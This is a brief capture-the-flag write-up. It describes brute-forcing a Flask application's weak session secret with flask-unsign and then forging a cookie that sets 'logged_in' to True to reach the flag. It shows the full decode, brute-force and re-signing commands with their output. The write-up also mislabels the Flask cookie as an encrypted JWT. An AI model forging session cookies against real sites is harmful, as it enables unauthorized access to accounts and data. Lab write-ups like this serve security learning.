Target IP/URL : http://35.242.223.46:31318/
When we visit the site, we find that it doesn’t allow us to access the content. So, first, we’ll perform traditional operations, such as viewing the source code.
We didn’t find any data that might help us, so we’ll use the burp suite to intercept the request
As we can see here, session cookies are encrypted From the first glance at the shape of the encrypted code, we conclude that it is a jwt (JSON web Token )
We will use one of the online sites to decrypt the jwt i will use “https://jwt.io/”
the result :
{
"logged_in": false
}Now we need to change the value from true to false but it’s not that easy 😎😈
we need to install tool “flask-unsign” the tool used to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. For the standalone wordlist component install it via this command
pip3 install flask-unsign[wordlist]
flask-unsign -u -c "eyJsb2dnZWRfaW4iOmZhbHNlfQ.aBIZQA.5J4pdo1hUYG_LasSvLo1E-pT7RQ"
[*] Session decodes to: {'logged_in': False}[*] No wordlist selected, falling back to default wordlist..[*] Starting brute-forcer with 8 threads..[*] Attempted (2176): -----BEGIN PRIVATE KEY-----ECR[+] Found secret key after 19840 attemptsVtRazrRfDmHP
'password'We found the password, now we will change the value and re-encrypt (sign) it with the same password we got via this command
flask-unsign -s -c "{'logged_in': True}" --secret "password"
eyJsb2dnZWRfaW4iOnRydWV9.aBIdiA.bD0hNRvI0LVqfJeliuqwR7B0UWENow we will change the JWT that we got on the burp suite tool to see the result
Alright We got the flag 😎😎💀
Thanks